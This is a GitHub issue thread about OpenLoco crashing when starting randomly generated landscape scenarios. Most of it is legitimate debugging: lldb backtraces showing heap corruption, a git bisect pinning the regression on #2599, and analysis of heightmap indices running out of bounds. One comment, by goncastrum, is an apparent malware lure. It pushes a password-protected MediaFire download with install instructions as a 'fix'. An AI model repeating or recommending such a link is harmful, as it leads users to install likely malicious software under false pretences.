### ISSUE TITLE
Crash with "Randomly Generated Landscape" scenarios

### ISSUE THREAD

**Issue by shusaura85** [OpenLoco/OpenLoco#2614]
**Version information:**
 - Windows 10
 - 24.09
 - 7755191c

**Describe the bug**
Game crashes when attempting to start a scenario with "Randomly Generated Landscape".  
Affected native scenarios:
1. Expert / Snowy Heights
2. Medium / Aerophobia
3. Medium / Rails against Roads
4. Beginner / Sandbox Settler
5. Beginner / Shinkansen Land 1970

**To Reproduce**
Steps to reproduce the behaviour:
1. Start game
6. Attemp to start a scenario with "Randomly Generated Landscape"
7. Game either freezes or crashes with a dump file
8. See error

**Expected behaviour**
Doesn't crash

**Additional context**
Sometimes, the game will not crash, but it rarely happens. It's more likely to crash than not

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by AaronVanGeffen** [comment]
Not sure what I expected this to be, but what I get in `lldb` has me stumped:

```
malloc(): invalid size (unsorted)
Process 4954 stopped
* thread #1, name = 'OpenLoco', stop reason = signal SIGABRT
    frame #0: 0xf7fc7579 [vdso]`__kernel_vsyscall + 9
[vdso]`__kernel_vsyscall:
->  0xf7fc7579 <+9>:  popl   %ebp
    0xf7fc757a <+10>: popl   %edx
    0xf7fc757b <+11>: popl   %ecx
    0xf7fc757c <+12>: retl   
(lldb) bt
* thread #1, name = 'OpenLoco', stop reason = signal SIGABRT
  * frame #0: 0xf7fc7579 [vdso]`__kernel_vsyscall + 9
    frame #1: 0xf763088f libc.so.6`___lldb_unnamed_symbol3963 + 287
    frame #2: 0xf75d6287 libc.so.6`raise + 39
    frame #3: 0xf75bd121 libc.so.6`abort + 242
    frame #4: 0xf75be150 libc.so.6`___lldb_unnamed_symbol3490 + 5
    frame #5: 0xf763c0bd libc.so.6`___lldb_unnamed_symbol4033 + 29
    frame #6: 0xf763f4b3 libc.so.6`___lldb_unnamed_symbol4062 + 1491
    frame #7: 0xf7640532 libc.so.6`malloc + 146
    frame #8: 0xf4de8447 swrast_dri.so`___lldb_unnamed_symbol18256 + 231
    frame #9: 0xf4de9100 swrast_dri.so`___lldb_unnamed_symbol18258 + 112
    frame #10: 0xf4d6f5fd swrast_dri.so`___lldb_unnamed_symbol17126 + 365
    frame #11: 0xf4d680b2 swrast_dri.so`___lldb_unnamed_symbol17073 + 450
    frame #12: 0xf4d6846e swrast_dri.so`___lldb_unnamed_symbol17074 + 654
    frame #13: 0xf4d6894e swrast_dri.so`___lldb_unnamed_symbol17078 + 622
    frame #14: 0xf4e823c3 swrast_dri.so`___lldb_unnamed_symbol19888 + 675
    frame #15: 0xf49fd091 swrast_dri.so`___lldb_unnamed_symbol11069 + 129
    frame #16: 0xf7e07dfc libSDL2-2.0.so.0`___lldb_unnamed_symbol2693 + 636
    frame #17: 0xf7dfbadc libSDL2-2.0.so.0`___lldb_unnamed_symbol2611 + 44
    frame #18: 0xf7e02177 libSDL2-2.0.so.0`___lldb_unnamed_symbol2651 + 567
    frame #19: 0xf7e0237c libSDL2-2.0.so.0`___lldb_unnamed_symbol2652 + 60
    frame #20: 0x01210f1c OpenLoco`OpenLoco::Gfx::SoftwareDrawingEngine::present(this=0x014df660) at SoftwareDrawingEngine.cpp:335:27
    frame #21: 0x0120b738 OpenLoco`OpenLoco::Gfx::renderAndUpdate() at Gfx.cpp:272:34
    frame #22: 0x0130abf3 OpenLoco`OpenLoco::Ui::Windows::ProgressBar::setProgress(unsigned char) [inlined] OpenLoco::Ui::Windows::ProgressBar::setProgress(value='\x19') at ProgressBar.cpp:80:29
    frame #23: 0x0130abdb OpenLoco`OpenLoco::Ui::Windows::ProgressBar::setProgress(value='\x19') at ProgressBar.cpp:73:10
    frame #24: 0x01297abe OpenLoco`OpenLoco::Ui::ProgressBar::setProgress(int) [inlined] OpenLoco::Ui::ProgressBar::setProgress(value=25) at ProgressBar.cpp:47:46
    frame #25: 0x01297ab0 OpenLoco`OpenLoco::Ui::ProgressBar::setProgress(value=25) at ProgressBar.cpp:43:10
    frame #26: 0x012442cf OpenLoco`OpenLoco::World::MapGenerator::generate(OpenLoco::S5::Options const&) at MapGenerator.cpp:722:37
    frame #27: 0x01289aa0 OpenLoco`OpenLoco::Scenario::generateLandscape() at Scenario.cpp:252:31
    frame #28: 0x0128a33b OpenLoco`OpenLoco::Scenario::start() at Scenario.cpp:362:30
    frame #29: 0x0128abc4 OpenLoco`OpenLoco::Scenario::loadAndStart(path=0xffffcfc0) at Scenario.cpp:423:14
    frame #30: 0x01316ca2 OpenLoco`OpenLoco::Ui::Windows::ScenarioSelect::onScrollMouseDown(OpenLoco::Ui::Window&, short, short, unsigned char) at ScenarioSelect.cpp:499:35
    frame #31: 0x0129b576 OpenLoco`OpenLoco::Ui::ScrollView::scrollLeftBegin(x=410, y=162, w=0x0144673c, widget=0x014470ea, widgetIndex='\t') at ScrollView.cpp:503:39
    frame #32: 0x01217f0c OpenLoco`OpenLoco::Input::stateNormal(OpenLoco::Input::MouseButton, short, short, OpenLoco::Ui::Window*, OpenLoco::Ui::Widget*, signed char) at MouseInput.cpp:1354:48
    frame #33: 0x012942c9 OpenLoco`OpenLoco::Ui::handleInput() at Ui.cpp:899:35
    frame #34: 0x01278263 OpenLoco`OpenLoco::tick() at OpenLoco.cpp:302:24
    frame #35: 0x01187766 OpenLoco`OpenLoco::main(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>>>&&) at OpenLoco.cpp:753:17
    frame #36: 0x01182a95 OpenLoco`main at Main.cpp:28:26
    frame #37: 0xf75bea77 libc.so.6`___lldb_unnamed_symbol3551 + 119
    frame #38: 0xf75beb3d libc.so.6`__libc_start_main + 141
    frame #39: 0x01191b57 OpenLoco`_start + 39
```

**Comment by AaronVanGeffen** [comment]
Confirmed, it still crashes with the calls in `updateProgress` commented out. Backtrace:

```
free(): invalid next size (normal)
Process 5592 stopped
* thread #1, name = 'OpenLoco', stop reason = signal SIGABRT
    frame #0: 0xf7fc7579 [vdso]`__kernel_vsyscall + 9
[vdso]`__kernel_vsyscall:
->  0xf7fc7579 <+9>:  popl   %ebp
    0xf7fc757a <+10>: popl   %edx
    0xf7fc757b <+11>: popl   %ecx
    0xf7fc757c <+12>: retl   
(lldb) bt
* thread #1, name = 'OpenLoco', stop reason = signal SIGABRT
  * frame #0: 0xf7fc7579 [vdso]`__kernel_vsyscall + 9
    frame #1: 0xf763088f libc.so.6`___lldb_unnamed_symbol3963 + 287
    frame #2: 0xf75d6287 libc.so.6`raise + 39
    frame #3: 0xf75bd121 libc.so.6`abort + 242
    frame #4: 0xf75be150 libc.so.6`___lldb_unnamed_symbol3490 + 5
    frame #5: 0xf763c0bd libc.so.6`___lldb_unnamed_symbol4033 + 29
    frame #6: 0xf763e23b libc.so.6`___lldb_unnamed_symbol4059 + 203
    frame #7: 0xf763e5a0 libc.so.6`___lldb_unnamed_symbol4060 + 736
    frame #8: 0xf7640b46 libc.so.6`__libc_free + 118
    frame #9: 0x012448df OpenLoco`OpenLoco::World::MapGenerator::generate(OpenLoco::S5::Options const&) at new_allocator.h:172:26
    frame #10: 0x01289960 OpenLoco`OpenLoco::Scenario::generateLandscape() at Scenario.cpp:252:31
    frame #11: 0x0128a1fb OpenLoco`OpenLoco::Scenario::start() at Scenario.cpp:362:30
    frame #12: 0x0128aa84 OpenLoco`OpenLoco::Scenario::loadAndStart(path=0xffffcfc0) at Scenario.cpp:423:14
    frame #13: 0x01316b62 OpenLoco`OpenLoco::Ui::Windows::ScenarioSelect::onScrollMouseDown(OpenLoco::Ui::Window&, short, short, unsigned char) at ScenarioSelect.cpp:499:35
    frame #14: 0x0129b436 OpenLoco`OpenLoco::Ui::ScrollView::scrollLeftBegin(x=407, y=156, w=0x0144673c, widget=0x014470ea, widgetIndex='\t') at ScrollView.cpp:503:39
    frame #15: 0x01217f0c OpenLoco`OpenLoco::Input::stateNormal(OpenLoco::Input::MouseButton, short, short, OpenLoco::Ui::Window*, OpenLoco::Ui::Widget*, signed char) at MouseInput.cpp:1354:48
    frame #16: 0x01294189 OpenLoco`OpenLoco::Ui::handleInput() at Ui.cpp:899:35
    frame #17: 0x01278123 OpenLoco`OpenLoco::tick() at OpenLoco.cpp:302:24
    frame #18: 0x01187766 OpenLoco`OpenLoco::main(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>>>&&) at OpenLoco.cpp:753:17
    frame #19: 0x01182a95 OpenLoco`main at Main.cpp:28:26
    frame #20: 0xf75bea77 libc.so.6`___lldb_unnamed_symbol3551 + 119
    frame #21: 0xf75beb3d libc.so.6`__libc_start_main + 141
    frame #22: 0x01191b57 OpenLoco`_start + 39
```

**Comment by AaronVanGeffen** [comment]
Fwiw, I thought it might be related to 076ecd86a644e6f0f5819b5de30fa71a74176fb3 (#2542), but reverting that had no effect.

**Comment by AaronVanGeffen** [comment]
Found the issue:
```
git bisect start
# status: waiting for both good and bad commits
# bad: [a5e33f2b835bfc8fd2bd2d48941c839d3967f48a] Revert "Remove more old code from OpenLoco.cpp (#2542)"
git bisect bad a5e33f2b835bfc8fd2bd2d48941c839d3967f48a
# status: waiting for good commit(s), bad commit known
# good: [dcd393ac5952a2b8e7dc7b8e909cccb096943f9d] Update version numbers to 23.12
git bisect good dcd393ac5952a2b8e7dc7b8e909cccb096943f9d
# good: [a91d0c424e8f1842abca7226e5e8b6cdd5f3225e] Update version numbers to 24.04
git bisect good a91d0c424e8f1842abca7226e5e8b6cdd5f3225e
# good: [d5608cc26b8c855776f25aacfe5a09c379607a8d] Update version numbers to 24.07
git bisect good d5608cc26b8c855776f25aacfe5a09c379607a8d
# good: [40e9b7bfe1cebf643989c48dca23a6f3313c7bbc] Update version numbers for 24.08
git bisect good 40e9b7bfe1cebf643989c48dca23a6f3313c7bbc
# bad: [c319ee8cab5366d073b38c6f5a78c9d1d56e403e] Implement Create Airport (#2585)
git bisect bad c319ee8cab5366d073b38c6f5a78c9d1d56e403e
# good: [c20eefcf1f093e22db50a438eec5713297597cd8] Paint Road (#2580)
git bisect good c20eefcf1f093e22db50a438eec5713297597cd8
# good: [b3d8f59392ff0ddba02363d973bfa489fdd39be0] Fix for sounds using wrong prng (#2598)
git bisect good b3d8f59392ff0ddba02363d973bfa489fdd39be0
# good: [4a4c488d3f1f018e42d993ea3a46b32c17498272] Vehicle Functions: Update daily (#2182)
git bisect good 4a4c488d3f1f018e42d993ea3a46b32c17498272
# bad: [c3d38dee27126322b659a038000ca2170da9028b] Limit heightmap generator to actual map size (#2599)
git bisect bad c3d38dee27126322b659a038000ca2170da9028b
# first bad commit: [c3d38dee27126322b659a038000ca2170da9028b] Limit heightmap generator to actual map size (#2599)
```

So this is a regression from #2599.

**Comment by AaronVanGeffen** [comment]
Interestingly, it's malloc itself that fails outright:
```
malloc(): invalid size (unsorted)
```

**Comment by ZehMatt** [comment]
I would try to add bounds check to all writes to the _height. Also are we sure that pitch is correct? Stride is typically used to to align the memory to a certain size so the computation might be off, I haven't looked at the full code but this is where it might be off. Also we should probably not use strider for the height map as we don't perform any imaging operations other than looking up the height value for {x, y} so we should keep it simply rows by column length.

**Comment by AaronVanGeffen** [comment]
I've simplified the HeightMap class, removing the pitch property and the unused copy constructor. In addition, I've added diagnostic logs to the `operator[]` functions.

The 'generate landscape' path in the scenario editor nicely iterates from 0x0 to 384x384. However, the same cannot be said for the random map scenarios. They iterate from 0x0 to 512x512! I'm guessing this is a code path we've not implemented, somehow.

**Comment by AaronVanGeffen** [comment]
The reason we didn't see it in the scenario editor makes sense, btw. There are two code paths:
```
        if ((hillShapesObj->flags & HillShapeFlags::isHeightMap) != HillShapeFlags::none)
        {
            auto g1Element = Gfx::getG1Element(hillShapesObj->image);
            copyHeightMapFromG1(g1Element, heightMap);
        }
        else
        {
            generateHills(options, heightMap);
        }
```

When a hill shapes object has been selected, like in the scenario editor, the first path is followed. Otherwise, the second path is taken. This is apparently the case for scenarios like Aerophobia.
